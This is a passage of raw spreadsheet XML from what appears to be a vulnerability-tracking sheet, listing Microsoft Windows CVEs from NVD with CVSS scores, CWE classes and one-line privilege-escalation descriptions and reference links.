      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr"/>
      <c r="Q813" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr"/>
      <c r="Q814" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr"/>
      <c r="Q815" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr"/>
      <c r="Q816" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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17" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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18" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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19" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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20" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr"/>
      <c r="Q820" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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21" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr"/>
      <c r="Q821" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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22" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr"/>
      <c r="Q822" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr"/>
      <c r="Q823" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr"/>
      <c r="Q824" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr"/>
      <c r="Q825" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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26" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr"/>
      <c r="Q826" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr"/>
      <c r="Q827" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr"/>
      <c r="Q828" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr"/>
      <c r="Q829" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr"/>
      <c r="Q830" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr"/>
      <c r="Q831" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>7.8</v>
      </c>
